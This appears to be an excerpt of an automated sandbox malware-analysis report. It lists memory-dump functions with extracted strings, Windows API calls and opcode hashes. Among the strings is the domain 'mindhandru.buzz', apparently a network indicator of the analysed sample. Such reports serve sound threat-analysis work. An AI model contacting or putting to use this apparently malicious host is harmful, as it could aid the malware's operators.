                                                      • String ID: (Y6[$.AtC$9]_$D!M#$Gq\s$Gu@w$S%U'$XyR{$Ym]o$b6j4$hI2K$k=W?$pE}G$yQrS$zMzO
                                                      • API String ID: 0-620192811
                                                      • Opcode ID: 11c015dd197e570f2fdc07bb442bc8113e1e7ba1a91e77874462be0a70133627
                                                      • Instruction ID: 208161a57ebc2b626ffa233a85f893a4c71bb5772c5dbbf1ae504593933ab12d
                                                      • Opcode Fuzzy Hash: 11c015dd197e570f2fdc07bb442bc8113e1e7ba1a91e77874462be0a70133627
                                                      • Instruction Fuzzy Hash: E90245B1200B41DFD734CF25D891BABBBE2FB45314F508A2CD5AA8BAA0D774A455CF50
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: FreeString
                                                      • String ID: :;$%$=hn$Jtuj$O^$SB$b{tu$gd$t"j
                                                      • API String ID: 3341692771-1335595022
                                                      • Opcode ID: bc2866b0fb7a199c2885e24f9001e23a203715b33722de9e051d5ab2ec12b902
                                                      • Instruction ID: 0c5cce54041c75309bc0e3125f119e633aaf3577b2ae6cc41f8f260c85392fac
                                                      • Opcode Fuzzy Hash: bc2866b0fb7a199c2885e24f9001e23a203715b33722de9e051d5ab2ec12b902
                                                      • Instruction Fuzzy Hash: B1222376A183519BD314CF24C890B9BBBE2EFC5314F18892CE5E49B3A1D775D845CB82
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: *,-"$3F&D$JyTK$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$L4$L4
                                                      • API String ID: 0-2746398225
                                                      • Opcode ID: a63c7615c14c92b8d11ab2b819cda41519dd297c4289a4a03ba1b1c4e3a75201
                                                      • Instruction ID: da9f64c938cbf0f4c631ccb68dfaaa3fe45f6467fbdebff3bef166368c37b2d8
                                                      • Opcode Fuzzy Hash: a63c7615c14c92b8d11ab2b819cda41519dd297c4289a4a03ba1b1c4e3a75201
                                                      • Instruction Fuzzy Hash: 1A422272A083548FC7348F28D8917ABB7E2FF95300F19893CD5D987696DB358846DB82
                                                      APIs
                                                      • RtlExpandEnvironmentStrings.NTDLL(?), ref: 000EFDFC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentExpandStrings
                                                      • String ID: #$6$=$\$g$m$w$x
                                                      • API String ID: 237503144-139252074
                                                      • Opcode ID: 39c7cd4539f2380836f2ad529928d9ca554644c6cef84028d781976a6a3e6f5a
                                                      • Instruction ID: 69c0d81d833d7bc0790e6af4e1812526fec244b7ecab6490a36d13ce8b70c552
                                                      • Opcode Fuzzy Hash: 39c7cd4539f2380836f2ad529928d9ca554644c6cef84028d781976a6a3e6f5a
                                                      • Instruction Fuzzy Hash: FA72923261C7918FD328DA39C8553AFBAD2ABD5320F198B3DE4E9D73D2D67489018742
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )$+$>$@$F$L$[$`
                                                      • API String ID: 0-4163809010
                                                      • Opcode ID: 637d2c988d717c7c26c8b5a2aa38d40da0ee461d8bd85cc395cf7efbe14e5593
                                                      • Instruction ID: ba870bc20132bc12fc779c49e42f88be0acc57b302406ff15a83dde87047fd9b
                                                      • Opcode Fuzzy Hash: 637d2c988d717c7c26c8b5a2aa38d40da0ee461d8bd85cc395cf7efbe14e5593
                                                      • Instruction Fuzzy Hash: AB529E7260C7808FC3249B38C5953EEBBE1AB95320F194A2EE5D9D77C2DA7489419B43
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %wu$*!D$.e~s$R7?$Ta*$UI0($^,;~$dcv~$p%7$wF~^
                                                      • API String ID: 0-1329555157
                                                      • Opcode ID: ade2d0b8193535a8e57dfbe3a0892eea5f4e5dd56e74ca717f6fadf13d2418d0
                                                      • Instruction ID: d3f2e8428ce7b61a5b1408565e94079465ef73e36ba99d58c3a8bdf48b67e194
                                                      • Opcode Fuzzy Hash: ade2d0b8193535a8e57dfbe3a0892eea5f4e5dd56e74ca717f6fadf13d2418d0
                                                      • Instruction Fuzzy Hash: 48B2F7F3A0C2149FE3046E2DEC8577ABBE9EF94360F1A453DEAC4C7744EA3558048696
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `pX$ I=$#[{k$%b~=$(7($1z{$Rn-$Vn-$opo$xo:
                                                      • API String ID: 0-2096714910
                                                      • Opcode ID: d071d8d1ad57bc72b6d7d3c4158ccc7dc3a2d2dd66bc06b69d249a7e949f0de0
                                                      • Instruction ID: 3eabc79d688086e917840773743beb6794b8ff30f483383357081c109c1600bb
                                                      • Opcode Fuzzy Hash: d071d8d1ad57bc72b6d7d3c4158ccc7dc3a2d2dd66bc06b69d249a7e949f0de0
                                                      • Instruction Fuzzy Hash: E1B2C3F3608200AFE704AE19EC8567AF7E9EF94720F1A493DEAC4C3744E63598458797
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: _^]\
                                                      • API String ID: 0-3116432788
                                                      • Opcode ID: 4513b023f55ed5d59980bcc2a2264d3fa7b5da84deea31e3ea144a35da153816
                                                      • Instruction ID: 94b461c46c66daef0cce5e942e767563a08e42f2c6bbdcc68cc095c98f66faac
                                                      • Opcode Fuzzy Hash: 4513b023f55ed5d59980bcc2a2264d3fa7b5da84deea31e3ea144a35da153816
                                                      • Instruction Fuzzy Hash: 5B8225715083518BC724CF28C8917BBB7E2FFC9314F198A6CE9D9976A5E7348806D742
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ;"I$,6.2$A$FM$PTvu$WAg.$cbrn
                                                      • API String ID: 0-3116088196
                                                      • Opcode ID: c9e207116f0d0e1d3c010b878aae285ff6d7d53aed98aae9b503113e93668ba5
                                                      • Instruction ID: e58199f26287a4984fb3e88d6bf6c61b73e3b03cc76c298a3d53531deea2536b
                                                      • Opcode Fuzzy Hash: c9e207116f0d0e1d3c010b878aae285ff6d7d53aed98aae9b503113e93668ba5
                                                      • Instruction Fuzzy Hash: 74C126B260C3D54FD322CF6A94A075BFFD19FD6210F094AACE4D52B386D275890AC792
                                                      APIs
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 001084BD
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 001085B4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Similarity
                                                      • API ID: EnvironmentExpandStrings
                                                      • String ID: LF7Y$_^]\
                                                      • API String ID: 237503144-3688711800
                                                      • Opcode ID: 21f427949dbbf9c4a48d7db67b37973f7bbd647959af5c2ae27154c6f3db69af
                                                      • Instruction ID: 2133a650880b71b1ab51a2613f73362986059d0463df1b64ba02f2155a4090b0
                                                      • Opcode Fuzzy Hash: 21f427949dbbf9c4a48d7db67b37973f7bbd647959af5c2ae27154c6f3db69af
                                                      • Instruction Fuzzy Hash: F0220E7190C381DFD3248F28D88172BBBE1BF89320F194A6CE9D9572E1D7719952CB92
                                                      APIs
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 001084BD
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 001085B4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Similarity
                                                      • API ID: EnvironmentExpandStrings
                                                      • String ID: LF7Y$_^]\
                                                      • API String ID: 237503144-3688711800
                                                      • Opcode ID: 529731c423335db82d85756b90bda80635419628430c7cc268a33eecec9829d8
                                                      • Instruction ID: 16c0455e7af80f48a18b7b4b7e7366d7551eec73dd8846530ef59f6b702ecc06
                                                      • Opcode Fuzzy Hash: 529731c423335db82d85756b90bda80635419628430c7cc268a33eecec9829d8
                                                      • Instruction Fuzzy Hash: 0012107190C381DFD3248F28D88176BBBE1BF89310F194A6CE9D9572E1D7709952CB92
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Q/4$[F~?$rQ}.$uw/
                                                      • API String ID: 0-611836863
                                                      • Opcode ID: ca81ab9304ba9b0a17162b39d848426f4c1671c65a83280fc6d358d78843968b
                                                      • Instruction ID: 77c4b07a32604fcc4732eec30968f3517d4949accd0df3e0319f56b657bd7647
                                                      • Opcode Fuzzy Hash: ca81ab9304ba9b0a17162b39d848426f4c1671c65a83280fc6d358d78843968b
                                                      • Instruction Fuzzy Hash: D4B2FBF3608204AFE304AE2DEC85A7AB7E9EFD4720F1A853DEAC4C3744E57558058697
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "_,Y$.[TU$;GsA$=K0E$pCj]
                                                      • API String ID: 0-1171452581
                                                      • Opcode ID: d2b4a46609a142b437e9398d515477966ab11fb25dad5cb2c0f80bce20d68d61
                                                      • Instruction ID: 985ce03f63562bbbbcc6913af2d0ace64a31519440cb5252b6e875faa5cd3ae7
                                                      • Opcode Fuzzy Hash: d2b4a46609a142b437e9398d515477966ab11fb25dad5cb2c0f80bce20d68d61
                                                      • Instruction Fuzzy Hash: 0891F1B16083009BC7249F24C895BA7B7F5EF95318F19842CF9C98B2D2E3B5E906C756
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 2h?n$7$SP$^`/4$gfff
                                                      • API String ID: 0-3257051659
                                                      • Opcode ID: 5ac865eece661e8749d5fa4cb78e48832db7c598d466312f2dc18716911dfc6b
                                                      • Instruction ID: 110d2b09d812529ca59c9c526dd3926247282b4877e1bb30f260eabbbd7f9f86
                                                      • Opcode Fuzzy Hash: 5ac865eece661e8749d5fa4cb78e48832db7c598d466312f2dc18716911dfc6b
                                                      • Instruction Fuzzy Hash: 46A14672A143508BD724CF28D8517AFB7E2FBC4318F19CA3DE585D7791EA3899068781
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: /<<|$1/V?$Ub?^$WbyN
                                                      • API String ID: 0-240682121
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 9deZ$eb$sp${s
                                                      • API String ID: 0-3993331145
                                                      APIs
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?), ref: 001091DA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentExpandStrings
                                                      • String ID: +Ku$wpq
                                                      • API String ID: 237503144-1953850642
                                                      APIs
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00109170
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentExpandStrings
                                                      • String ID: M/($M/(
                                                      • API String ID: 237503144-1710806632
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: VN$VN$i$i
                                                      • API String ID: 0-1885346908
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 81Z{$<f^C$J.%p
                                                      • API String ID: 0-2957531361
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .txt$<\hX$_^]\
                                                      • API String ID: 0-3117400391
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Fm$V]$mindhandru.buzz
                                                      • API String ID: 0-77585785
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: [V$bh
                                                      • API String ID: 0-2174178241
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 9HGg$o@v
                                                      • API String ID: 0-3886043323
                                                      • Opcode ID: 7c5f1bfe93074a70b5e6b022e2102c508fb810dee516d27bba5344c1a7db6f61
                                                      • Instruction ID: 49268d5c6be6f2c13535b8ee6a9cbcf48d8a19472b66ec57e928d12fac2fe40f
                                                      • Opcode Fuzzy Hash: 7c5f1bfe93074a70b5e6b022e2102c508fb810dee516d27bba5344c1a7db6f61
                                                      • Instruction Fuzzy Hash: AD12AEF3F151214BF3584938CDA83667692DBD4320F2F82398B99ABBC9D97E5D064384
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ok$/qw
                                                      • API String ID: 0-3917829760
                                                      • Opcode ID: c6989c3db82a11f3bfb30d562b5985aa1270aa3096b156ee54445fe9dc67c9ba
                                                      • Instruction ID: ca88d87082e2905d91c76ae1c532f030e1598305c5048883d1023b0c66ba6d09
                                                      • Opcode Fuzzy Hash: c6989c3db82a11f3bfb30d562b5985aa1270aa3096b156ee54445fe9dc67c9ba
                                                      • Instruction Fuzzy Hash: 5CF1F0F3F012294BF3544928DD59362B683DBD4324F2F82398E5DAB7C9E97E5D068284
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: &$wt
                                                      • API String ID: 0-2890898390
                                                      • Opcode ID: bd051d39f6af925a808e72b0427b622752a6f1ef0c2072f79d78dee953fdf51e
                                                      • Instruction ID: 052dcdb8b2a11b1fe4f78d3282c3b503a6412e86fe8f32d3d745cd3d2f913ae2
                                                      • Opcode Fuzzy Hash: bd051d39f6af925a808e72b0427b622752a6f1ef0c2072f79d78dee953fdf51e
                                                      • Instruction Fuzzy Hash: E581477150C3808BD725CF29C4517BBBBE1EFDA324F195A1CE4DA9B292E7348805CB86
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )$IEND
                                                      • API String ID: 0-707183367
                                                      • Opcode ID: 1a860b5c64b84ed600f203c875f6faaa750c10c745fc96d916bbc0f24c8aefd4
                                                      • Instruction ID: 9a76cf48a7f017e8cd2a85d63867182bcb702885fac9ccfaa6940cec166b737f
                                                      • Opcode Fuzzy Hash: 1a860b5c64b84ed600f203c875f6faaa750c10c745fc96d916bbc0f24c8aefd4
                                                      • Instruction Fuzzy Hash: 0CD180B1908384DFD720CF25D845B9FBBE4AB94304F14492DF999AB382D775E908CB92
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !'$$$!'$$
                                                      • API String ID: 0-4225345315
                                                      • Opcode ID: c569e4d86acde8962a9bf95c3b09da019427f572404bf0d4ad0254bbc001970b
                                                      • Instruction ID: 8d8fbce6e722d3fdfe7e1f7cce7c8dd41920f49534ea92c0f89f8cbc6d75f47c
                                                      • Opcode Fuzzy Hash: c569e4d86acde8962a9bf95c3b09da019427f572404bf0d4ad0254bbc001970b
                                                      • Instruction Fuzzy Hash: 08716AB3F1122547F3584C78CD69362A682DB95324F2F827C8E4DAB7C5D97E9E064384
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ?>?
                                                      • API String ID: 0-2754718721
                                                      • Opcode ID: cfd4417b4a0369d62d7f018005118386448c9aadeee7d6d81bdc26814b5bb849
                                                      • Instruction ID: 76e312466df3a3715141026f13702a3b2bd7a95f6cf521a75962f789990d125e
                                                      • Opcode Fuzzy Hash: cfd4417b4a0369d62d7f018005118386448c9aadeee7d6d81bdc26814b5bb849
                                                      • Instruction Fuzzy Hash: ABF1D0F3F142204BF3445A29DC85366B6D2EBD4320F2F863D9A88977C5E97D8D068785
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: :Evt
                                                      • API String ID: 0-3868124071
                                                      • Opcode ID: b8f4b06acc579d16adbb45a9e8726b4f52ee0914c117ee34ef754e885a4a8659
                                                      • Instruction ID: 726cac877ac34f50dc1c62b3e41364d6fbc1e1af0918911021a7ac892e3847a6
                                                      • Opcode Fuzzy Hash: b8f4b06acc579d16adbb45a9e8726b4f52ee0914c117ee34ef754e885a4a8659
                                                      • Instruction Fuzzy Hash: 59E1D0B3F182108BF3145E28DC89376B792EBD4320F2B863DDA98577C4DA7E59058785
                                                      APIs
                                                      • FreeLibrary.KERNEL32(1A11171A), ref: 0010D2A4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID:
                                                      • API String ID: 3664257935-0
                                                      • Opcode ID: 13ca611c0d2374fe7543d0e839b4caebc0f70ecaef5832a8f222512900b26dec
                                                      • Instruction ID: d59dcc27db954bf50d78f6e44bb0a72f8961deb7f2935afcdede9b9416ff1f5f
                                                      • Opcode Fuzzy Hash: 13ca611c0d2374fe7543d0e839b4caebc0f70ecaef5832a8f222512900b26dec
                                                      • Instruction Fuzzy Hash: E14102702043819BE3258F38D9A0B62BFE1EF57314F28868CE5DA4B793D775D8468B51
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ><+
                                                      • API String ID: 0-2918635699
                                                      • Opcode ID: 620cea9a7709512f8b795e66d6583c700f59217fff0158bc4518db95c7dc92c5
                                                      • Instruction ID: 079df01973b9a6eb85556c921966763a5265e369e6d78fbbf1aed22864cabf84
                                                      • Opcode Fuzzy Hash: 620cea9a7709512f8b795e66d6583c700f59217fff0158bc4518db95c7dc92c5
                                                      • Instruction Fuzzy Hash: 95C1E2756047418FD729CF2AD490762FBF2BF9A310B28859DC4DA8B792C775E806CB50
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "
                                                      • API String ID: 0-123907689
                                                      • Opcode ID: 2a481a20cd818ae86bd77ddd76c28e78242e6649cf267746c47876947a36422a
                                                      • Instruction ID: 778b4f831e08442b5c4bdab60bef9ad7fba86cc0f7ca73013a30a441893ab026
                                                      • Opcode Fuzzy Hash: 2a481a20cd818ae86bd77ddd76c28e78242e6649cf267746c47876947a36422a
                                                      • Instruction Fuzzy Hash: 78C1F7B2A0C3055FD7258E24C8D076BB7E5AF94310F19896DE8D98B3C2E7B4ED448792
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .
                                                      • API String ID: 0-248832578
                                                      • Opcode ID: 6bcf511bbda4145751b66c98a1a2d09089d8752e8d9c21aa791a5b2aa390b3e9
                                                      • Instruction ID: d71938d9a8f320d373d2d3c472f769d9894b03364ff6df3d219e90f91924ebe9
                                                      • Opcode Fuzzy Hash: 6bcf511bbda4145751b66c98a1a2d09089d8752e8d9c21aa791a5b2aa390b3e9
                                                      • Instruction Fuzzy Hash: 1BD189F7F112254BF3544938CD983A166839BD1324F2F82788F5C6B7C9D8BE5E0A9284
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: t
                                                      • API String ID: 0-2238339752
                                                      • Opcode ID: d0bbef6a49a2f02bd17f313bcdd25b5128c12bfd7b6f8db4e6c7f91fa3d22f99
                                                      • Instruction ID: 1efb917f08b7e2fb62374077c4b7821c24d1c12be238a30a48d0e8f97ad1105a
                                                      • Opcode Fuzzy Hash: d0bbef6a49a2f02bd17f313bcdd25b5128c12bfd7b6f8db4e6c7f91fa3d22f99
                                                      • Instruction Fuzzy Hash: 48B17DF3F102244BF3548929CD643627683DBD5325F2F82798F49AB7C9D87EAD0A5284
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RwX
                                                      • API String ID: 0-3484669424
                                                      • Opcode ID: 2de552d22e64a903a19f9741a174b7bd2cd93bd86cb5dba54314779714e743b9
                                                      • Instruction ID: 72229f7e5243cbbde45a8751ed5763de868b27d00ddc43ed20985c3803e02e38
                                                      • Opcode Fuzzy Hash: 2de552d22e64a903a19f9741a174b7bd2cd93bd86cb5dba54314779714e743b9
                                                      • Instruction Fuzzy Hash: B7B19EB3F1162447F3884928CCA93A22283DBD5324F2F81798B9D9B7C5DD7E9D0A5384
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: 7a265a4d8a4b744bd028c6ceae3042bb2bcc07b3126893c7d8121078d0b89d8b
                                                      • Instruction ID: 84240ece6059cbe062356ec0384d31573db12124845df451539c3283fb8fabe7
                                                      • Opcode Fuzzy Hash: 7a265a4d8a4b744bd028c6ceae3042bb2bcc07b3126893c7d8121078d0b89d8b
                                                      • Instruction Fuzzy Hash: 48A1ACF3F116158BF3444928DCA83A23693DBA5324F2F827C8B4A5B7C5D97E9D069384
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: aL11
                                                      • API String ID: 0-1289567318
                                                      • Opcode ID: 9ab6197618018920b26947e6adc783cd786207f4ef55c0225a4bf9f0594c690e
                                                      • Instruction ID: 7e16519d036af21f720ce37f66a7aef1f6a3afa2d19d186a5e51395951bf3074
                                                      • Opcode Fuzzy Hash: 9ab6197618018920b26947e6adc783cd786207f4ef55c0225a4bf9f0594c690e
                                                      • Instruction Fuzzy Hash: 40A15EB3F512254BF3544D28CC983A17683DBD5324F2F82788E4D6BBC9D97E5E0A5284
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: V
                                                      • API String ID: 0-1342839628
                                                      • Opcode ID: b931679d2d203629e2536e7aeb2344299825b079d75077baf703a2d72d60018b
                                                      • Instruction ID: 55c8530b0747443fe6bfa2296095cec7f59d162e3f06518c28602d28ffc878d0
                                                      • Opcode Fuzzy Hash: b931679d2d203629e2536e7aeb2344299825b079d75077baf703a2d72d60018b
                                                      • Instruction Fuzzy Hash: CC914CB3F5122547F3544928CD583617693DBD1325F2F82388E8CAB7C5D97EAE0A5384
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ^
                                                      • API String ID: 0-1590793086
                                                      • Opcode ID: a7a2fbc980eec0429270dfcc01c32d3d25ba31bb8a2f7653d57a9f52e9a4fada
                                                      • Instruction ID: 10c868ae91407c4c31422eb7dffd5a1906d0a70962e5470165d92adbd7d1c074
                                                      • Opcode Fuzzy Hash: a7a2fbc980eec0429270dfcc01c32d3d25ba31bb8a2f7653d57a9f52e9a4fada
                                                      • Instruction Fuzzy Hash: 9591BCB3F2152547F3584839CC683A26683DBE1320F3F827C8E599B7D5D97E9E095284
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: _^]\
                                                      • API String ID: 2994545307-3116432788
                                                      • Opcode ID: 5af7ddabc81bc7e7d2f265d21a3591fb4ea44bbc7e357dd718207f0bbf673a1c
